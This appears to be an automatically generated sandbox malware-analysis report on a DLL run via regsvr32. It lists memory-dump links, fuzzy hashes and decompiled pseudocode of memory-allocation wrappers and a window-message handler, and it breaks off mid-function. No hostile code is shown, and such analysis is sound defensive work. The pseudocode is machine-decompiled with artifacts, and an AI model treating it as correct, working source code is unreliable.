Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: CriticalDeleteSection$Free
String ID:
API String ID: 1584690612-0
Opcode ID: ebcd786f80deebfaad633a4f9e4df6eda4f042b6b9029d5109c4e1f745d13760
Instruction ID: 75f82927723a04ed7dba8f78a102e70b804421880de5b3bfe3838acbd9483e33
Opcode Fuzzy Hash: ebcd786f80deebfaad633a4f9e4df6eda4f042b6b9029d5109c4e1f745d13760
Instruction Fuzzy Hash: 62C04C745405538EE608C7388C8981C3656B7517307E00705F57AC50F4DB3498438A41

Uniqueness

Uniqueness Score: -1.00%

Function 100202C3 Relevance: 1.3, APIs: 1, Instructions: 85
memoryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E100202C3(void* __ecx, intOrPtr _a4) {
				intOrPtr _v8;
				signed int _t45;
				intOrPtr _t48;
				signed int _t49;
				intOrPtr _t51;
				intOrPtr _t52;
				intOrPtr _t53;
				signed int _t54;
				intOrPtr* _t55;
				signed int _t57;
				intOrPtr _t60;
				intOrPtr _t61;
				intOrPtr _t62;
				void* _t69;
				void* _t70;
				void* _t77;
				signed int _t78;
				intOrPtr _t81;

				_t60 = _a4;
				_t81 =  *((intOrPtr*)(_t60 + 0x10));
				_t45 =  *(_t60 + 8);
				_t57 = 0;
				while(_t45 >= 0) {
					_t45 = _t45 << 1;
					_t57 = _t57 + 1;
				}
				_t69 = 0x3f;
				_t48 = _t57 * 0x204 + _t81 + 0x144;
				_v8 = _t48;
				do {
					 *((intOrPtr*)(_t48 + 8)) = _t48;
					 *((intOrPtr*)(_t48 + 4)) = _t48;
					_t48 = _t48 + 8;
					_t69 = _t69 - 1;
				} while (_t69 != 0);
				_t77 = (_t57 << 0xf) +  *((intOrPtr*)(_t60 + 0xc));
				_t49 = VirtualAlloc(_t77, 0x8000, 0x1000, 4); // executed
				if(_t49 != 0) {
					_t70 = _t77 + 0x7000;
					if(_t77 <= _t70) {
						_t55 = _t77 + 0x10;
						do {
							 *(_t55 - 8) =  *(_t55 - 8) | 0xffffffff;
							 *(_t55 + 0xfec) =  *(_t55 + 0xfec) | 0xffffffff;
							 *((intOrPtr*)(_t55 - 4)) = 0xff0;
							 *_t55 = _t55 + 0xffc;
							 *((intOrPtr*)(_t55 + 4)) = _t55 - 0x1004;
							 *((intOrPtr*)(_t55 + 0xfe8)) = 0xff0;
							_t55 = _t55 + 0x1000;
						} while (_t55 - 0x10 <= _t70);
					}
					_t61 = _t77 + 0xc;
					_t51 = _v8 + 0x1f8;
					_t78 = 1;
					 *((intOrPtr*)(_t51 + 4)) = _t61;
					 *((intOrPtr*)(_t61 + 8)) = _t51;
					_t62 = _t70 + 0xc;
					 *((intOrPtr*)(_t51 + 8)) = _t62;
					 *((intOrPtr*)(_t62 + 4)) = _t51;
					 *(_t81 + 0x44 + _t57 * 4) =  *(_t81 + 0x44 + _t57 * 4) & 0x00000000;
					 *(_t81 + 0xc4 + _t57 * 4) = _t78;
					_t52 =  *((intOrPtr*)(_t81 + 0x43));
					_t53 = _a4;
					 *((char*)(_t81 + 0x43)) = _t52 + 1;
					if(_t52 == 0) {
						 *(_t53 + 4) =  *(_t53 + 4) | _t78;
					}
					 *(_t53 + 8) =  *(_t53 + 8) &  !(0x80000000 >> _t57);
					_t54 = _t57;
				} else {
					_t54 = _t49 | 0xffffffff;
				}
				return _t54;
			}

0x100202c7
0x100202cd
0x100202d0
0x100202d3
0x100202d5
0x100202d9
0x100202db
0x100202db
0x100202e8
0x100202e9
0x100202f0
0x100202f3
0x100202f3
0x100202f6
0x100202f9
0x100202fc
0x100202fc
0x10020306
0x10020314
0x1002031c
0x10020326
0x1002032e
0x10020330
0x10020333
0x10020333
0x10020337
0x10020344
0x1002034b
0x10020353
0x10020356
0x10020360
0x10020368
0x10020333
0x1002036f
0x10020372
0x10020379
0x1002037a
0x1002037d
0x10020380
0x10020383
0x10020386
0x10020389
0x1002038e
0x10020395
0x1002039e
0x100203a1
0x100203a4
0x100203a6
0x100203a6
0x100203b4
0x100203b7
0x1002031e
0x1002031e
0x1002031e
0x100203bd

APIs

VirtualAlloc.KERNEL32(?,00008000,00001000,00000004,?,00000000,000000E0,?,?,1001FFE9,000000E0,?,?,?), ref: 10020314

Memory Dump Source

Source File: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: ea8f8ae632835d9acafd7ff39cb8159fe34645344088bee97997f21ef4b240c6
Instruction ID: 2a59ec8f7fee7de42fd713978820a24f6579379c3068771672d987af00cfbadc
Opcode Fuzzy Hash: ea8f8ae632835d9acafd7ff39cb8159fe34645344088bee97997f21ef4b240c6
Instruction Fuzzy Hash: F031AE316003069FD314CF18D888BA5BBE4FF443A8F65C2BEE5598B2A2D770DA46CB40

Uniqueness

Uniqueness Score: -1.00%

Function 1001DDC5 Relevance: 1.3, APIs: 1, Instructions: 56
memoryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 73%

			E1001DDC5(signed int _a4, signed int _a8) {
				void* _t8;
				long _t11;
				void* _t13;
				long _t15;
				void* _t17;
				void* _t23;

				_t15 = _a4 * _a8;
				_t11 = _t15;
				if(_t15 <= 0xffffffe0) {
					if(_t15 == 0) {
						_t15 = 1;
					}
					_t15 = _t15 + 0x0000000f & 0xfffffff0;
				}
				while(1) {
					_t13 = 0;
					if(_t15 > 0xffffffe0) {
						goto L8;
					}
					_t23 = _t11 -  *0x10090f2c; // 0x3f8
					if(_t23 > 0) {
						L7:
						_t13 = HeapAlloc( *0x100967a8, 8, _t15);
						if(_t13 != 0) {
							L12:
							return _t13;
						}
						goto L8;
					}
					E1001F3A0(9);
					_push(_t11); // executed
					_t8 = E1001FF09(); // executed
					_t13 = _t8;
					E1001F401(9);
					_t17 = _t17 + 0xc;
					if(_t13 != 0) {
						E1001AB60(_t13, 0, _t11);
						goto L12;
					}
					goto L7;
					L8:
					if( *0x10095064 == 0) {
						goto L12;
					}
					if(E10020ADE(_t15) == 0) {
						return 0;
					}
				}
			}

0x1001ddcc
0x1001ddd4
0x1001ddd6
0x1001ddda
0x1001ddde
0x1001ddde
0x1001dde2
0x1001dde2
0x1001dde5
0x1001dde5
0x1001ddea
0x00000000
0x00000000
0x1001ddec
0x1001ddf2
0x1001de11
0x1001de20
0x1001de24
0x1001de48
0x00000000
0x1001de48
0x00000000
0x1001de24
0x1001ddf6
0x1001ddfb
0x1001ddfc
0x1001de03
0x1001de05
0x1001de0a
0x1001de0f
0x1001de40
0x00000000
0x1001de45
0x00000000
0x1001de26
0x1001de2d
0x00000000
0x00000000
0x1001de38
0x00000000
0x1001de4e
0x1001de3a

APIs

HeapAlloc.KERNEL32(00000008,?,?,?,?,1001E9EB,00000001,00000074), ref: 1001DE1A

Memory Dump Source

Source File: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: AllocHeap
String ID:
API String ID: 4292702814-0
Opcode ID: 90d31d9b320faf60aea6ceefc157ccfb56581b9e1e6148fb0b54efd4ec31012d
Instruction ID: e28994d743fc9cd978ae04b880549cb875e5466f1d8a5530c0077bf3cd58f2e3
Opcode Fuzzy Hash: 90d31d9b320faf60aea6ceefc157ccfb56581b9e1e6148fb0b54efd4ec31012d
Instruction Fuzzy Hash: 1801FC37A016206AE611F1655CC1B5B62D5EBE17F2F160227FD58AF2D2E770ECC18191

Uniqueness

Uniqueness Score: -1.00%

Function 1001A722 Relevance: 1.3, APIs: 1, Instructions: 29
memoryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 43%

			E1001A722(void* _a4) {
				void* _t2;
				void* _t4;
				int _t6;
				void* _t12;

				_t12 = _a4;
				if(_t12 == 0) {
					return _t2;
				} else {
					E1001F3A0(9);
					_t4 = E1001FBB3(_t12);
					if(_t4 == 0) {
						E1001F401(9);
						_t6 = HeapFree( *0x100967a8, 0, _t12); // executed
						return _t6;
					}
					_push(_t12);
					_push(_t4);
					E1001FBDE();
					return E1001F401(9);
				}
			}

0x1001a723
0x1001a729
0x1001a769
0x1001a72b
0x1001a72d
0x1001a733
0x1001a73c
0x1001a753
0x1001a762
0x00000000
0x1001a762
0x1001a73e
0x1001a73f
0x1001a740
0x1001a750
0x1001a750

APIs

Part of subcall function 1001F3A0: InitializeCriticalSection.KERNEL32(00000000,?,?,?,1001A732,00000009,?,1001EB47,?,?,1001A909,00000000,1001A950,?,?,?), ref: 1001F3DD
Part of subcall function 1001F3A0: EnterCriticalSection.KERNEL32(?,?,?,1001A732,00000009,?,1001EB47,?,?,1001A909,00000000,1001A950,?,?,?), ref: 1001F3F8

HeapFree.KERNEL32(00000000,?,?), ref: 1001A762

Part of subcall function 1001F401: LeaveCriticalSection.KERNEL32(?,1001A7CC,00000009,?,00000009,?,?,1001A78C,000000E0,1001A779,?,1001F3C0,00000018,?,?), ref: 1001F40E

Memory Dump Source

Source File: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: CriticalSection$EnterFreeHeapInitializeLeave
String ID:
API String ID: 1934031791-0
Opcode ID: 1279a5a8e5e90784f937ec6b1f33d65cd811d425bc96cef6cac2b321af1cd81f
Instruction ID: e8653404110237f0dca75a4b00474dbcaddf432de790ef49cd13fc7feae0a813
Opcode Fuzzy Hash: 1279a5a8e5e90784f937ec6b1f33d65cd811d425bc96cef6cac2b321af1cd81f
Instruction Fuzzy Hash: D6E0203650A2303AE900A350BC87FEF1784DF51620F050409F50C5D0D1DFB0F9C141D1

Uniqueness

Uniqueness Score: -1.00%

Function 100014CE Relevance: 1.3, APIs: 1, Instructions: 11
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E100014CE(void* _a4, long _a8, long _a12, long _a16) {
				void* _t7;

				_t7 = VirtualAlloc(_a4, _a8, _a12, _a16); // executed
				return _t7;
			}

0x10005094
0x1000509a

APIs

VirtualAlloc.KERNEL32(?,?,?,?), ref: 10005094

Memory Dump Source

Source File: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: bf9133692adda3f79166fd755d8b8dd5745be882d9c739cd713b553011c693b1
Instruction ID: 6a5f06191fbc15860af94901a01daaa8801841911e62e32d69311e8d39755988
Opcode Fuzzy Hash: bf9133692adda3f79166fd755d8b8dd5745be882d9c739cd713b553011c693b1
Instruction Fuzzy Hash: 07C002B5515301BFDA04CB54C998D6FB7E9FBC8341F10890DF599C3214C631E844DBA2

Uniqueness

Uniqueness Score: -1.00%

Function 1000150F Relevance: 1.3, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1000150F(void* _a4, long _a8, long _a12) {
				int _t5;

				_t5 = VirtualFree(_a4, _a8, _a12); // executed
				return _t5;
			}

0x100050bf
0x100050c5

APIs

VirtualFree.KERNELBASE(?,?,?), ref: 100050BF

Memory Dump Source

Source File: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 75da4575b152e21249991af41e1f992b31ec58ddb8a6fc048605264aabbb2b1c
Instruction ID: d50fd430b484ddb41d6e349ab629232114dca9e6aabc5053ee5ece3fc3d4903b
Opcode Fuzzy Hash: 75da4575b152e21249991af41e1f992b31ec58ddb8a6fc048605264aabbb2b1c
Instruction Fuzzy Hash: 55C04C79104200BFEA04DB10C9D8D3FB7A9EBC8751F10C90DB99983314C671EC40DBA2

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 1003BD55 Relevance: 37.1, APIs: 18, Strings: 3, Instructions: 343
windowkeyboardCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E1003BD55(signed int __ecx) {
				signed int _t116;
				signed int _t119;
				signed int _t120;
				struct HWND__* _t124;
				signed int _t126;
				intOrPtr _t127;
				signed char _t141;
				signed int _t145;
				signed int _t149;
				signed int _t150;
				void* _t160;
				intOrPtr* _t167;
				signed int _t169;
				signed int _t182;
				signed int _t183;
				signed int _t186;
				signed int _t188;
				signed int _t198;
				void* _t200;
				signed short _t208;
				intOrPtr _t211;
				void* _t215;
				void* _t217;
				void* _t218;
				void* _t220;
				void* _t221;

				_t116 = E1001A9E0(0x10078361, _t215);
				_t218 = _t217 - 0x74;
				_t167 =  *((intOrPtr*)(_t215 + 8));
				_t208 =  *(_t167 + 4);
				_t198 = __ecx;
				 *(_t215 - 0x10) = __ecx;
				 *(_t215 - 0x1c) = _t208;
				if(_t208 == 0x200 || _t208 == 0xa0 || _t208 == 0x202 || _t208 == 0x205 || _t208 == 0x208) {
					_t116 = GetKeyState(1);
					if(_t116 < 0) {
						L49:
						_t208 =  *(_t215 - 0x1c);
						goto L50;
					}
					_t116 = GetKeyState(2);
					if(_t116 < 0) {
						goto L49;
					}
					_t116 = GetKeyState(4);
					if(_t116 < 0) {
						goto L49;
					} else {
						_push( *_t167);
						L9:
						_t116 = E10041F78(_t215);
						if(_t116 != 0 && ( *(_t116 + 0x24) & 0x00000401) == 0) {
							_push(GetParent( *(_t116 + 0x1c)));
							goto L9;
						}
						__eflags = _t116 - _t198;
						if(_t116 == _t198) {
							_t211 = E100655E1(0x10094918, E10062AFA);
							 *((intOrPtr*)(_t215 - 0x18)) = _t211;
							_t169 =  *(_t211 + 0xcc);
							_t119 = E10043703(_t198);
							__eflags = _t169;
							 *(_t215 - 0x14) = _t119;
							if(_t169 == 0) {
								L19:
								_t120 = E10045FEF(0x58);
								 *(_t215 - 0x1c) = _t120;
								_t169 = 0;
								__eflags = _t120;
								 *(_t215 - 4) = 0;
								if(__eflags != 0) {
									_t169 = E1003B6FC(_t120);
								}
								 *(_t215 - 4) =  *(_t215 - 4) | 0xffffffff;
								_push(1);
								_t116 = E1003B751(_t169, __eflags,  *(_t215 - 0x14));
								__eflags = _t116;
								if(_t116 != 0) {
									SendMessageA( *(_t169 + 0x1c), 0x401, 0, 0);
									_t198 =  *(_t215 - 0x10);
									 *(_t211 + 0xcc) = _t169;
									L25:
									E1001AB60(_t215 - 0x54, 0, 0x2c);
									_t124 =  *(_t198 + 0x1c);
									_t220 = _t218 + 0xc;
									 *(_t215 - 0x4c) = _t124;
									 *(_t215 - 0x48) = _t124;
									 *(_t215 - 0x54) = 0x28;
									 *(_t215 - 0x50) = 1;
									_t126 = SendMessageA( *(_t169 + 0x1c), 0x408, 0, _t215 - 0x54);
									__eflags = _t126;
									if(_t126 == 0) {
										SendMessageA( *(_t169 + 0x1c), 0x404, 0, _t215 - 0x54);
									}
									_t127 =  *((intOrPtr*)(_t215 + 8));
									 *((intOrPtr*)(_t215 - 0x24)) =  *((intOrPtr*)(_t127 + 0x18));
									 *(_t215 - 0x28) =  *(_t127 + 0x14);
									ScreenToClient( *(_t198 + 0x1c), _t215 - 0x28);
									E1001AB60(_t215 - 0x80, 0, 0x2c);
									_t221 = _t220 + 0xc;
									 *(_t215 - 0x80) = 0x28;
									_t116 =  *((intOrPtr*)( *_t198 + 0x64))( *(_t215 - 0x28),  *((intOrPtr*)(_t215 - 0x24)), _t215 - 0x80);
									 *(_t215 - 0x1c) = _t116;
									asm("sbb ecx, ecx");
									_t182 =  ~(_t116 + 1) & _t198;
									__eflags =  *(_t211 + 0xd4) - _t116;
									 *(_t215 - 0x14) = _t182;
									if( *(_t211 + 0xd4) != _t116) {
										L33:
										__eflags = _t116 - 0xffffffff;
										if(_t116 == 0xffffffff) {
											SendMessageA( *(_t169 + 0x1c), 0x401, 0, 0);
											L42:
											E1003BCC3(_t169,  *((intOrPtr*)(_t215 + 8)));
											__eflags =  *(_t211 + 0xd8) - 0x28;
											_t91 = _t211 + 0xd8; // 0xd8
											_t200 = _t91;
											if( *(_t211 + 0xd8) >= 0x28) {
												SendMessageA( *(_t169 + 0x1c), 0x405, 0, _t200);
											}
											 *(_t211 + 0xd0) =  *(_t215 - 0x14);
											 *(_t211 + 0xd4) =  *(_t215 - 0x1c);
											_t183 = 0xb;
											_t116 = memcpy(_t200, _t215 - 0x80, _t183 << 2);
											goto L45;
										}
										_t186 = 0xb;
										_t141 = memcpy(_t215 - 0x54, _t215 - 0x80, _t186 << 2);
										_t221 = _t221 + 0xc;
										_t188 =  *(_t215 - 0x10);
										 *(_t215 - 0x50) = _t141;
										__eflags =  *(_t188 + 0x24) & 0x00000400;
										if(( *(_t188 + 0x24) & 0x00000400) != 0) {
											_t150 = _t141 | 0x00000020;
											__eflags = _t150;
											 *(_t215 - 0x50) = _t150;
										}
										SendMessageA( *(_t169 + 0x1c), 0x404, 0, _t215 - 0x54);
										__eflags =  *(_t215 - 0x79) & 0x00000040;
										if(( *(_t215 - 0x79) & 0x00000040) != 0) {
											L38:
											SendMessageA( *(_t169 + 0x1c), 0x401, 1, 0);
											_t145 =  *(_t215 - 0x10);
											__eflags =  *(_t145 + 0x24) & 0x00000400;
											if(( *(_t145 + 0x24) & 0x00000400) != 0) {
												SendMessageA( *(_t169 + 0x1c), 0x411, 1, _t215 - 0x54);
											}
											SetWindowPos( *(_t169 + 0x1c), 0, 0, 0, 0, 0, 0x213);
											goto L41;
										} else {
											_t149 = E10043747( *(_t215 - 0x10));
											__eflags = _t149;
											if(_t149 == 0) {
												L41:
												_t211 =  *((intOrPtr*)(_t215 - 0x18));
												goto L42;
											}
											goto L38;
										}
									} else {
										__eflags =  *(_t211 + 0xd0) - _t182;
										if( *(_t211 + 0xd0) != _t182) {
											goto L33;
										}
										__eflags =  *(_t198 + 0x25) & 0x00000004;
										if(( *(_t198 + 0x25) & 0x00000004) == 0) {
											__eflags = _t116 - 0xffffffff;
											if(_t116 != 0xffffffff) {
												_t116 = E1003BCC3(_t169,  *((intOrPtr*)(_t215 + 8)));
											}
										} else {
											GetCursorPos(_t215 - 0x20);
											_t116 = SendMessageA( *(_t169 + 0x1c), 0x412, 0, ( *(_t215 - 0x1c) & 0x0000ffff) << 0x00000010 |  *(_t215 - 0x20) & 0x0000ffff);
										}
										L45:
										__eflags =  *((intOrPtr*)(_t215 - 0x5c)) - 0xffffffff;
										if( *((intOrPtr*)(_t215 - 0x5c)) != 0xffffffff) {
